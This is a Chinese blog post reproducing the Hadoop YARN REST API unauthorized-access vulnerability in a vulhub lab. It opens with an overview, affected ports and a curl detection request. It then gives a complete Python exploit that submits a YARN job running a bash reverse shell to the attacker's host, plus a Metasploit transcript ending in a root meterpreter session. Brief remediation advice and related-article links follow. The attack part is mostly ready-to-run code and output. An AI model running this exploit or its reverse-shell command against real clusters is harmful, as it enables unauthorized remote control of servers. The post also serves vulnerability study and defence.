【漏洞复现】Hadoop YARN 资源管理系统 REST API未授权访问

最新推荐文章于 2024-05-20 08:00:00 发布
最新推荐文章于 2024-05-20 08:00:00 发布
阅读量4.3k 收藏 1
点赞数 1
分类专栏: 漏洞复现验证 文章标签: hadoop yarn 未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43486390/article/details/111319422
版权

0x01 概述

Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当可导致未授权访问的问题,攻击者无需认证即可通过REST API部署任务来执行任意指令,最终完全控制服务器。

0x02 影响范围

(1)Apache Hadoop YARN资源管理系统
(2)对外开启以下作用的端口:

yarn.resourcemanager.webapp.address,默认端口8088
yarn.resourcemanager.webapp.https.address,默认端口8090

0x03 简单检测

(1)环境:vulhub
(2)访问http://192.168.178.128:8008出现hadoop未授权访问页面。
在这里插入图片描述(3)构造POST请求,返回如下信息证明存在
curl -X POST 192.168.178.128:8088/ws/v1/cluster/apps/new-application
在这里插入图片描述

0x04 漏洞复现

修改exp脚本目标url、本地IP、监听端口,然后开启本地监听9999端口(与脚本一致即可)准备反弹shell,执行exp脚本文件python3 hadooprce.py,即可获取shell
hadooprce.py文件内容:

import requests

#python3 
target = 'http://192.168.178.128:8088/'  # put your remote host IP here
lhost = '192.168.178.129'  # put your local host IP here
 
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
print(resp.text)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
print (data)
requests.post(url, json=data)

在这里插入图片描述
也可以利用msf的模块:

msf5 > use exploit/linux/http/hadoop_unauth_exec
msf5 exploit(linux/http/hadoop_unauth_exec) > set rhosts 192.168.178.128
rhosts => 192.168.178.128
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.178.129
lhost => 192.168.178.129
msf5 exploit(linux/http/hadoop_unauth_exec) > set lport 4444
lport => 4444
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit 

[*] Started reverse TCP handler on 192.168.178.129:4444 
[*] Sending Command
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (980808 bytes) to 192.168.178.128
[*] Meterpreter session 1 opened (192.168.178.129:4444 -> 192.168.178.128:36834) at 2020-12-17 17:42:02 +0800

meterpreter > getuid
Server username: no-user @ 1ab507230acc (uid=0, gid=0, euid=0, egid=0)
meterpreter >

0x05 修复建议

1.通过iptables或者安全组配置访问策略,限制对8088等端口的访问,不要将接口开放在公网,改为本地或者内网调用;
2.Hadoop在2.X以上版本提供了安全认证功能,加入了 认证机制,建议启用Kerberos认证功能。

ps_x
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Hadoop 授权访问原理扫描】及Apache Hadoop YARN 资源管理器 REST API授权访问漏洞原理扫描】修复记录
萌兔兔MMQ!!
01-10 3000
Hadoop相关授权访问漏洞风险较高且使用hadoop的用户比较多,经常在安全检查用遇到这两个漏洞。 修复方法也就是按绿盟扫描器提供的方法: 一、对于Apache Hadoop YARN 资源管理器 REST API授权访问漏洞原理扫描】: 方法1.在防火墙上设置“安全组”访问控制策略,将 HadoopWebUI(8088) 等相关端口限制可信任的 IP 地址才能访问。 方法22.将默认认证方法改为KerBeros认证。 但我目前遇到过的管理员没有愿意将hadoop采用KerBeros认证的,看了
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
【学习笔记】Hadoop YARN REST API授权访问
chualam的博客
11-01 872
一般来说 api授权访问一般导致信息泄露,但是如果包含管理和任务执行功能 就会扩大危害程度 它的restapi开放在xx端口 善用官方文档 看调用使用说明 查看具体调用的位置 curl -v -X post '网站详细地址' 可以得到application id 从官方文档查看调用的具体参数 编辑一个data.json curl -s -i -X POST -H 'accept:application/json' -H 'content-type:application/json' api
授权访问Hadoop 授权访问漏洞
最新发布
qq_68163788的博客
05-20 1114
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop Yarn RPC授权访问漏洞
热门推荐
LiBai'S BLOG
11-22 1万+
Hadoop Yarn RPC授权访问漏洞???? 漏洞详情????影响版本???? 复现环境????FOFA语法????漏洞利用????漏洞修复 ???? 漏洞详情 Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。 Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC
Hadoop/Yarn REST API授权访问漏洞
weixin_44455388的博客
09-27 4274
一、基本情况 漏洞分布:所有版本 漏洞级别:高危 漏洞类别:授权漏洞 漏洞URL: http://25.215.209.1:19888/ http://25.215.209.1:50070/ http://25.215.209.1:50090/ http://25.215.209.1:50075/ http://25.215.209.1:8088/cluster 二、漏洞描述 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的
Hadoop Yarn REST API授权漏洞排查
dayouzi的博客
08-14 621
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
你的数据安全么?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn资源管理系统授权访问漏洞进行攻击...
weixin_34112208的博客
05-08 274
2019独角兽企业重金招聘Python工程师标准>>> ...
yarn rest api授权漏洞
weixin_34343689的博客
01-02 340
项目集群之前在yarn8088的web资源管理页面上看到一堆莫名的定时任务,就是黑客利用漏洞挖矿,最后禁用了8088端口。 freebuff传送门: https://www.freebuf.com/vuls/173638.html 转载于:https://www.cnblogs.com/yanghaolie/p/10209051.html...
hadoop-yarn-api-2.5.1-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-api-2.5.1.jar; 赠送原API文档:hadoop-yarn-api-2.5.1-javadoc.jar; 赠送源代码:hadoop-yarn-api-2.5.1-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-api-2.5.1.pom; 包含翻译后...
基于SpringBoot的Hadoop-Yarn资源监控系统源码.zip
06-08
在大数据领域,Hadoop是一个广泛使用的开源框架,用于存储和处理大规模数据,而YARN(Yet Another Resource Negotiator)是Hadoop资源管理系统,负责任务调度和集群资源管理。 【描述】基于SpringBoot的Hadoop-...
hadoop-yarn-client-2.6.5-API文档-中文版.zip
05-01
赠送原API文档:hadoop-yarn-client-2.6.5-javadoc.jar; 赠送源代码:hadoop-yarn-client-2.6.5-sources.jar; 赠送Maven依赖信息文件:hadoop-yarn-client-2.6.5.pom; 包含翻译后的API文档:hadoop-yarn-client-...
Hadoop-yarn-授权访问漏洞
qq_42735101的博客
06-26 2048
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-授权访问漏洞复现
Hadoop Yarn REST API授权漏洞利用
weixin_30564901的博客
08-21 1078
   Hadoop Yarn REST API授权漏洞利用 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关...
数据库安全:Hadoop 授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3525
Hadoop 授权访问主要因HadoopYARN资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop授权访问getshell
Birdman-one的博客
12-11 1569
Hadoop授权访问getshell 一、环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d http://ip:8088/cluster 访问地址出现此页面代表授权访问 二、漏洞复现 exp #!/usr/bin/env python import requests target = 'http://xx.xx.xx.xx:8088/' lhost = 'x.x.x.x' # 把你的本地主机ip放在这里,在9999端口监
Hadoop-授权访问漏洞复现
weixin_42090431的博客
04-27 736
1、搭建环境 2、访问:http://your-ip:8088。3、EXP 监听9999端口。
Hadoop_unauthorized-yarn
qq_56895581的博客
05-19 739
由于服务器的配置不当开放了HFDS的50070及相关服务端口,导致攻击者可以利用命令行直接操作多个目录下的数据(删除、下载、甚至命令执行)
hadoop yarn资源管理组件
09-13
Hadoop YARN(Yet Another Resource Negotiator)是Hadoop的一个资源管理和作业调度的框架,它是Hadoop 2.x版本中引入的重要组件。YARN的设计目的是解决早期版本Hadoop MapReduce框架中的一些问题。 YARN的主要组件包括ResourceManager(资源管理器)、NodeManager(节点管理器)、ApplicationMaster(应用程序管理器)和Container(容器)。 ResourceManager是整个集群的资源管理节点,它负责管理和分配集群中的资源。ResourceManager在启动时向集群中的各个NodeManager发送心跳信息,以获取每个节点上的可用资源信息。当有任务提交到集群时,ResourceManager负责为任务分配资源,并监控任务的运行状态。 NodeManager是每个节点上的资源管理组件,它负责管理单个节点上的资源。NodeManager会向ResourceManager发送心跳信息,以汇报节点上的可用资源和任务运行状态。当ResourceManager给节点分配任务时,NodeManager会启动对应的容器来运行任务。 ApplicationMaster是运行在集群中的每个应用程序的主要管理组件。它负责申请资源、监控任务的运行状态、处理任务的失败和重新调度、与ResourceManager和NodeManager交互等。每个应用程序都有一个独立的ApplicationMaster。 Container是YARN中的资源抽象单位,它封装了一个或多个物理资源(如CPU、内存、磁盘等)。Container是ResourceManager向NodeManager分配任务所使用的资源单位。每个任务都在一个独立的容器内进行,容器提供了隔离和资源控制的功能。 通过使用YARN这个资源管理组件,Hadoop可以更好地管理集群中的资源,实现任务的有效调度与执行。YARN的引入使得Hadoop不仅仅局限于MapReduce,还可以支持其他计算框架,如Spark、Storm等,为大数据处理提供了更多的可能性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值